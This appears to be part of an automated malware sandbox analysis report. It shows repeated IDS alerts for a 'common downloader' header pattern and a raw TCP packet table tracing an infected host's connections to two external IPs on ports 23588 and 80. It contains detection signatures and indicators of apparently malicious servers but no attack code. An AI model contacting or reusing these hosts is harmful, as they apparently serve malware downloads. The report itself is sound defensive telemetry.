                                                                                                                                          2024-12-19T15:33:49.522293+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549814107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:33:49.522365+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549815107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:33:53.576110+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549859107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:33:53.576147+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549860116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:33:53.576176+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549857107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:33:56.329824+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549899116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:33:57.708282+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549900107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:33:57.708363+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549897107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:01.922280+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549943107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:01.922308+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549944116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:01.922315+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549938107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:03.882293+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549983116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:05.938341+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549982107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:05.938912+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549980107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:07.901128+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550029116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:09.938157+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550028107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:09.938193+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550026107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:11.998149+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550073116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:14.078380+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550072107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:14.078461+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550074107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:16.124537+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550124116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:18.094296+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550123107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:18.094296+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550121107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:20.060517+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550169116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:22.219354+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550166107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:22.219408+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550168107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:26.235546+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550211116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:26.235588+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550210107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:26.235589+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550208107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:28.300492+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550261116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:30.260068+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550256107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:30.260102+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550260107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:32.273166+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550312116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:34.390927+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550311107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:34.391007+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550308107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:37.014304+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550373116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:38.517665+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550374107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:38.518078+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550371107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:40.492801+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550442116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:42.517559+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550443107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:42.517591+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550436107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:44.460965+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550514116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:46.532733+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550515107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:46.532789+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550510107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:50.548185+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550597107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:50.548218+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550599116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:50.548231+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550600107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:54.563154+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550694116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:54.563201+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550690107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:54.563221+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550692107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:58.581718+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550815107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:58.581765+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550820107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:58.581797+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550821116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:00.531712+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550968116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:02.594584+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550967107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:02.594994+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550962107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:04.602169+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.551159116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:06.840239+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.551158107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:06.840273+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.551148107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:08.945512+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.551338116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:10.989053+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.551331107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:10.989135+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.551337107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:13.774372+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.551564116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:15.141197+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.551553107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:15.141198+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.551561107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:17.090682+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.551811116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:19.164022+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.551803107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:19.164053+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.551810107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:22.454987+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553337116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:23.313500+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.552999107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:23.313524+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.552806107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:25.922944+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.555397116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:27.461328+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.555398107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:27.461551+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.555399107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:29.752186+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.558026116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:31.719758+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.558021107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:31.721035+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.558024107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:35.720361+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.559600107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:35.720398+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.559713116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:35.720432+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.559752107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:37.694973+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.562269116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:39.876631+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.562271107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:39.876738+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.562270107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:39.876748+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564965116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:41.869054+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.565117116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:44.001026+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.565081107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:44.001126+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.565116107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:45.970804+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.551145116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:48.126628+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.551043107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:48.126659+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.551144107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:50.736803+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553691116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:52.142027+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.553692107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:52.142064+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.553634107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:56.157102+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.555835116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:56.157493+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.555836107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:56.157932+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.555778107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:58.175529+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.558043116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:36:00.173328+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.558045107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:00.173372+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.557965107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:03.560201+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.561064116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:36:04.297888+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.560319107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:04.297917+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.560345107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:08.443719+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.562823116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:36:08.443784+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.562825107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:08.443812+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.562729107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:11.079166+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549190116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:36:12.579717+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549177107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:12.579718+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549188107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:14.682367+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.551417116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:36:16.595175+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.551340107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:16.595345+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.551418107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:20.614467+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.552994116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:36:20.614490+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.552993107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:20.614529+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.552889107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:24.626516+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.555567107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:24.626567+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.555602107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:24.626595+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.555604116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:36:26.715575+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.557901116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:36:28.642235+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.557794107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:28.642269+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.557903107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:30.697075+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.560362116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:36:32.676772+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.560361107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:32.676811+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.560254107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:36.083749+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.562635107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:36.083794+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.562667107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:36.083800+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.563422116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:36:38.041832+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564310116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:36:40.204175+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.564311107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:40.204221+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.564313107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:42.322679+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550407116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:36:44.220151+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550408107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:44.220250+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550290107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:47.818287+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553368116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:36:48.433843+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.552832107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:48.433898+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.552878107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:50.547672+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.554824116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:36:52.594920+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.554823107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:52.595139+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.554804107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:54.669045+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.556892116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:36:56.749020+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.556890107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:56.749142+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.556893107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:36:58.732633+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.559314116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:37:00.876747+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.559231107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:37:00.876781+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.559313107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:37:04.474074+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.562377116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:37:05.001203+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.562045107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:37:05.001270+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.561952107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:37:06.983025+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.563810116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:37:07.518667+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.563790107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:37:07.518717+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.563809107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:37:09.575587+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564717116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:37:11.642377+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.564715107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:37:11.642579+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.564718107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:37:15.635195+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.551632116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:37:15.818984+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550608107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:37:15.819027+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550543107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:37:18.875742+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.552689116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:37:20.197833+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.552688107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:37:20.197840+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.552686107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:37:22.180429+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553533116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:37:42.238712+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.553487107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:37:42.379327+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.553534107.160.131.25423588TCP

                                                                                                                                          Network Port Distribution

                                                                                                                                          TCP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Dec 19, 2024 15:33:17.311587095 CET4971818659192.168.2.5107.160.131.253
                                                                                                                                          Dec 19, 2024 15:33:17.314383984 CET4971918530192.168.2.5107.163.56.110
                                                                                                                                          Dec 19, 2024 15:33:17.431797028 CET1865949718107.160.131.253192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:17.431909084 CET4971818659192.168.2.5107.160.131.253
                                                                                                                                          Dec 19, 2024 15:33:17.434139013 CET1853049719107.163.56.110192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:17.434204102 CET4971918530192.168.2.5107.163.56.110
                                                                                                                                          Dec 19, 2024 15:33:17.452064037 CET4971818659192.168.2.5107.160.131.253
                                                                                                                                          Dec 19, 2024 15:33:17.452320099 CET4971918530192.168.2.5107.163.56.110
                                                                                                                                          Dec 19, 2024 15:33:17.572823048 CET1865949718107.160.131.253192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:17.572840929 CET1853049719107.163.56.110192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:39.327002048 CET1865949718107.160.131.253192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:39.327074051 CET4971818659192.168.2.5107.160.131.253
                                                                                                                                          Dec 19, 2024 15:33:39.327195883 CET4971818659192.168.2.5107.160.131.253
                                                                                                                                          Dec 19, 2024 15:33:39.446753025 CET1865949718107.160.131.253192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:43.463710070 CET4979223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:43.464024067 CET4979423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:43.585283041 CET2358849792107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:43.585299969 CET2358849794107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:43.585403919 CET4979223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:43.586337090 CET4979423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:43.586338043 CET4979223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:43.586730957 CET4979423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:43.705818892 CET2358849792107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:43.706259966 CET2358849794107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:45.397452116 CET4971918530192.168.2.5107.163.56.110
                                                                                                                                          Dec 19, 2024 15:33:45.397573948 CET4979223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:45.397603989 CET4979423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:45.510092974 CET4981423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:45.512221098 CET4981523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:45.629632950 CET2358849814107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:45.629745960 CET4981423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:45.629937887 CET4981423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:45.631709099 CET2358849815107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:45.631800890 CET4981523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:45.631921053 CET4981523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:45.749365091 CET2358849814107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:45.751348972 CET2358849815107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:47.271791935 CET4983280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:47.391330957 CET8049832116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:47.391438007 CET4983280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:47.392971039 CET4983280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:47.512815952 CET8049832116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:49.117685080 CET8049832116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:49.117774963 CET4983280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:49.122260094 CET49853443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:49.122313976 CET44349853116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:49.122445107 CET49853443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:49.134360075 CET49853443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:49.134375095 CET44349853116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:49.522027969 CET49853443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:33:49.522293091 CET4981423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:33:49.522365093 CET4981523588192.168.2.5107.160.131.254
